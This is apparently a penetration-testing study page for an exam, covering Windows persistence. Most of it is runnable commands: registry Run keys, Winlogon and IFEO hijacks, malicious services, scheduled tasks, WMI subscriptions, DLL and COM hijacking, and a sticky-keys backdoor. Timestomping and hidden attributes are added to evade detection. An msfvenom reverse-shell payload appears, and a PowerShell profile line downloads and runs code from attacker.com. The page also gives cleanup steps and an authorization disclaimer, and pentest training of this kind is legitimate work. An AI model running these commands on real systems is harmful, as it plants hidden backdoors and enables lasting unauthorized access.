Windows Persistence

Overview

Persistence is the art of maintaining access to a compromised system across reboots, user logouts, and other system changes. This guide covers the most common and effective Windows persistence techniques used in penetration testing.

What is Persistence?

Definition

Persistence refers to techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Why Persistence Matters for PJPT

Maintain access during long-term engagements
Survive system reboots and user logouts
Demonstrate impact to clients
Essential for advanced post-exploitation activities

Registry-Based Persistence

1. Registry Run Keys

The most common persistence method using Windows registry autorun locations.

Current User Run Key

# Add persistence for current user
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Users\Public\update.exe" /f

# PowerShell equivalent
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SecurityUpdate" -Value "C:\Users\Public\update.exe" -PropertyType String -Force

# Verify persistence entry
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Local Machine Run Key (Requires Admin)

# Add system-wide persistence (requires admin rights)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe" /f

# PowerShell equivalent
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdate" -Value "C:\Windows\System32\backdoor.exe" -PropertyType String -Force

Additional Registry Locations

# RunOnce keys (execute once then delete)
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

# Run keys for specific scenarios  
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

# Winlogon registry keys
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

2. Registry Persistence Examples

# Userinit persistence (very stealthy)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Windows\system32\backdoor.exe" /f

# Shell persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe,C:\Windows\system32\backdoor.exe" /f

# Image File Execution Options (IFEO) hijacking
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\system32\backdoor.exe" /f

Service-Based Persistence

1. Creating Windows Services

# Create new service for persistence
sc create "WindowsSecurityUpdate" binpath= "C:\Windows\System32\backdoor.exe" start= auto
sc description "WindowsSecurityUpdate" "Provides critical security updates for Windows"
sc start "WindowsSecurityUpdate"

# PowerShell service creation
New-Service -Name "WindowsSecurityUpdate" -BinaryPathName "C:\Windows\System32\backdoor.exe" -StartupType Automatic -Description "Provides critical security updates"
Start-Service -Name "WindowsSecurityUpdate"

2. Modifying Existing Services

# Modify existing service binary path
sc config "Spooler" binpath= "C:\Windows\System32\backdoor.exe && C:\Windows\System32\spoolsv.exe"

# Modify service to depend on our malicious service
sc config "Spooler" depend= "WindowsSecurityUpdate"

# Query service configuration
sc qc "WindowsSecurityUpdate"

3. Service DLL Hijacking

# Modify service to load malicious DLL
reg add "HKLM\SYSTEM\CurrentControlSet\Services\YourService\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "C:\Windows\System32\malicious.dll" /f

# Restart service to load malicious DLL
sc stop "YourService"
sc start "YourService"

Scheduled Tasks Persistence

1. Basic Scheduled Task Creation

# Create scheduled task that runs at startup
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru "SYSTEM" /f

# Create task that runs every 5 minutes
schtasks /create /tn "SystemMaintenance" /tr "C:\Windows\System32\backdoor.exe" /sc minute /mo 5 /ru "SYSTEM" /f

# Create task that runs at user logon
schtasks /create /tn "UserProfile" /tr "C:\Windows\System32\backdoor.exe" /sc onlogon /ru "SYSTEM" /f

2. PowerShell Scheduled Tasks

# Create scheduled task using PowerShell
$action = New-ScheduledTaskAction -Execute "C:\Windows\System32\backdoor.exe"
$trigger = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "WindowsSecurityUpdate" -Action $action -Trigger $trigger -Principal $principal

# Create task with multiple triggers
$trigger1 = New-ScheduledTaskTrigger -AtStartup
$trigger2 = New-ScheduledTaskTrigger -AtLogOn
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\System32\script.ps1"
Register-ScheduledTask -TaskName "SystemMaintenance" -Action $action -Trigger @($trigger1, $trigger2) -RunLevel Highest

3. Scheduled Task Management

# List all scheduled tasks
schtasks /query /fo LIST /v

# Query specific task
schtasks /query /tn "WindowsUpdate" /fo LIST /v

# Delete scheduled task
schtasks /delete /tn "WindowsUpdate" /f

# Modify existing task
schtasks /change /tn "WindowsUpdate" /tr "C:\Windows\System32\newbackdoor.exe"

Startup Folder Persistence

1. User Startup Folder

# Copy backdoor to user startup folder
copy "C:\Windows\System32\backdoor.exe" "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"

# PowerShell copy
Copy-Item "C:\Windows\System32\backdoor.exe" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"

# Create shortcut in startup folder
powershell "$WshShell = New-Object -comObject WScript.Shell; $Shortcut = $WshShell.CreateShortcut('$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk'); $Shortcut.TargetPath = 'C:\Windows\System32\backdoor.exe'; $Shortcut.Save()"

2. All Users Startup Folder (Admin Required)

# Copy to all users startup (requires admin)
copy "C:\Windows\System32\backdoor.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\update.exe"

# PowerShell copy for all users
Copy-Item "C:\Windows\System32\backdoor.exe" "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs\StartUp\update.exe"

WMI Persistence

1. WMI Event Subscription

# Create WMI event filter (trigger)
$Filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
    Name = "SystemStartupFilter"
    EventNameSpace = "root\cimv2"
    QueryLanguage = "WQL"
    Query = "SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2"
} -ErrorAction Stop

# Create WMI event consumer (action)
$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{
    Name = "SystemStartupConsumer"
    CommandLineTemplate = "C:\Windows\System32\backdoor.exe"
} -ErrorAction Stop

# Bind filter to consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{
    Filter = $Filter
    Consumer = $Consumer
} -ErrorAction Stop

2. WMI Persistence Cleanup

# Remove WMI persistence
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription -Filter "Filter = '__EventFilter.Name=""SystemStartupFilter""'" | Remove-WmiObject
Get-WmiObject __EventFilter -Namespace root\subscription -Filter "Name = 'SystemStartupFilter'" | Remove-WmiObject
Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -Filter "Name = 'SystemStartupConsumer'" | Remove-WmiObject

DLL Hijacking Persistence

1. DLL Search Order Hijacking

# Identify DLL hijacking opportunities
# Look for missing DLLs in application directories
Process Monitor (ProcMon) -> Filter by "Process and Thread Activity" -> Look for "NAME NOT FOUND"

# Common hijackable DLLs
C:\Windows\System32\WINMM.dll
C:\Windows\System32\WININET.dll
C:\Windows\System32\VERSION.dll

2. Phantom DLL Hijacking

# Create malicious DLL in application directory
# Copy legitimate DLL functionality and add backdoor code
copy "malicious.dll" "C:\Program Files\VulnerableApp\missing.dll"

# Restart application to load malicious DLL
taskkill /f /im "VulnerableApp.exe"
start "" "C:\Program Files\VulnerableApp\VulnerableApp.exe"

Advanced Persistence Techniques

1. COM Hijacking

# Identify COM objects to hijack
reg query "HKCU\SOFTWARE\Classes\CLSID" /s | findstr /i "inprocserver32"

# Hijack COM object
reg add "HKCU\SOFTWARE\Classes\CLSID\{CLSID-HERE}\InprocServer32" /ve /t REG_SZ /d "C:\Windows\System32\backdoor.dll" /f

2. AppInit_DLLs

# Add DLL to AppInit_DLLs (loads into every process)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\System32\malicious.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f

3. Accessibility Features Backdoor

# Replace sticky keys with cmd.exe (classic technique)
takeown /f "C:\Windows\System32\sethc.exe" /a
icacls "C:\Windows\System32\sethc.exe" /grant administrators:F
copy /y "C:\Windows\System32\cmd.exe" "C:\Windows\System32\sethc.exe"

# Use at login screen by pressing SHIFT 5 times

# Other accessibility features to hijack
C:\Windows\System32\utilman.exe (Windows Key + U)
C:\Windows\System32\osk.exe (On-Screen Keyboard)
C:\Windows\System32\narrator.exe (Windows Key + Enter)

PowerShell-Based Persistence

1. PowerShell Profile Modification

# Modify PowerShell profile for persistence
$ProfilePath = $PROFILE.AllUsersAllHosts
Add-Content -Path $ProfilePath -Value 'Start-Process "C:\Windows\System32\backdoor.exe" -WindowStyle Hidden'

# User-specific profile
$UserProfile = $PROFILE.CurrentUserAllHosts
Add-Content -Path $UserProfile -Value 'IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'

2. PowerShell ISE Persistence

# Modify PowerShell ISE profile
$ISEProfile = $PROFILE.CurrentUserCurrentHost.Replace("profile.ps1", "Microsoft.PowerShellISE_profile.ps1")
Add-Content -Path $ISEProfile -Value 'Start-Process "C:\Windows\System32\backdoor.exe" -WindowStyle Hidden'

Persistence Detection Evasion

1. Timestomping

# Match file timestamps to system files
powershell "(Get-Item 'C:\Windows\System32\backdoor.exe').LastWriteTime = (Get-Item 'C:\Windows\System32\kernel32.dll').LastWriteTime"
powershell "(Get-Item 'C:\Windows\System32\backdoor.exe').CreationTime = (Get-Item 'C:\Windows\System32\kernel32.dll').CreationTime"

2. File Attribute Manipulation

# Hide files and set system attributes
attrib +h +s "C:\Windows\System32\backdoor.exe"

# Remove from directory listings
attrib +h +s +r "C:\Windows\System32\backdoor.exe"

Practical Persistence Scenarios

Scenario 1: User-Level Persistence

# 1. Create payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > backdoor.exe

# 2. Upload to target
copy backdoor.exe "C:\Users\Public\update.exe"

# 3. Create registry persistence
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Users\Public\update.exe" /f

# 4. Test persistence
shutdown /r /t 0

Scenario 2: System-Level Persistence

# 1. Escalate to SYSTEM privileges
# (use token impersonation, service exploitation, etc.)

# 2. Create service persistence
sc create "WindowsDefender" binpath= "C:\Windows\System32\backdoor.exe" start= auto
sc description "WindowsDefender" "Windows Defender Antivirus Service"

# 3. Start service
sc start "WindowsDefender"

# 4. Create scheduled task backup
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru "SYSTEM" /f

Scenario 3: Stealth Persistence

# 1. Use DLL hijacking for stealth
# Find vulnerable application
# Create malicious DLL

# 2. Modify existing service
sc config "Spooler" binpath= "C:\Windows\System32\backdoor.exe && C:\Windows\System32\spoolsv.exe"

# 3. WMI persistence for advanced stealth
# Use PowerShell WMI event subscription

# 4. COM hijacking
reg add "HKCU\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32" /ve /t REG_SZ /d "malicious.dll" /f

Cleanup and Removal

Registry Cleanup

# Remove registry run keys
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /f

# Remove winlogon persistence
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f

Service Cleanup

# Stop and delete services
sc stop "WindowsSecurityUpdate"
sc delete "WindowsSecurityUpdate"

# Restore modified services
sc config "Spooler" binpath= "C:\Windows\System32\spoolsv.exe"

Scheduled Task Cleanup

# Delete scheduled tasks
schtasks /delete /tn "WindowsUpdate" /f
schtasks /delete /tn "SystemMaintenance" /f

PJPT Exam Tips

Essential Commands to Memorize

# Registry persistence
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\backdoor.exe" /f

# Service persistence
sc create "Service" binpath= "C:\backdoor.exe" start= auto

# Scheduled task persistence  
schtasks /create /tn "Task" /tr "C:\backdoor.exe" /sc onstart /ru "SYSTEM" /f

# Startup folder persistence
copy backdoor.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"

Documentation Requirements

Show privilege level required for each technique
Document persistence method used
Provide cleanup instructions for client
Test persistence across reboots
Screenshot evidence of successful persistence

Common Mistakes to Avoid

Not testing persistence after reboot
Using obvious names for services/tasks
Forgetting to document cleanup procedures
Not considering detection/evasion
Failing to escalate privileges when needed

Note: Always ensure proper authorization before implementing persistence techniques. These methods should only be used in authorized penetration testing scenarios. Proper cleanup is essential to avoid impacting client systems after the engagement.

PreviousNTDS.dit Extraction NextPost-Compromise Strategy

Last updated 7 months ago

hashtagOverview

hashtagWhat is Persistence?

hashtagDefinition

hashtagWhy Persistence Matters for PJPT

hashtagRegistry-Based Persistence

hashtag1. Registry Run Keys

hashtagCurrent User Run Key

hashtagLocal Machine Run Key (Requires Admin)

hashtagAdditional Registry Locations

hashtag2. Registry Persistence Examples

hashtagService-Based Persistence

hashtag1. Creating Windows Services

hashtag2. Modifying Existing Services

hashtag3. Service DLL Hijacking

hashtagScheduled Tasks Persistence

hashtag1. Basic Scheduled Task Creation

hashtag2. PowerShell Scheduled Tasks

hashtag3. Scheduled Task Management

hashtagStartup Folder Persistence

hashtag1. User Startup Folder

hashtag2. All Users Startup Folder (Admin Required)

hashtagWMI Persistence

hashtag1. WMI Event Subscription

hashtag2. WMI Persistence Cleanup

hashtagDLL Hijacking Persistence

hashtag1. DLL Search Order Hijacking

hashtag2. Phantom DLL Hijacking

hashtagAdvanced Persistence Techniques

hashtag1. COM Hijacking

hashtag2. AppInit_DLLs

hashtag3. Accessibility Features Backdoor

hashtagPowerShell-Based Persistence

hashtag1. PowerShell Profile Modification

hashtag2. PowerShell ISE Persistence

hashtagPersistence Detection Evasion

hashtag1. Timestomping

hashtag2. File Attribute Manipulation

hashtagPractical Persistence Scenarios

hashtagScenario 1: User-Level Persistence

hashtagScenario 2: System-Level Persistence

hashtagScenario 3: Stealth Persistence

hashtagCleanup and Removal

hashtagRegistry Cleanup

hashtagService Cleanup

hashtagScheduled Task Cleanup

hashtagPJPT Exam Tips

hashtagEssential Commands to Memorize

hashtagDocumentation Requirements

hashtagCommon Mistakes to Avoid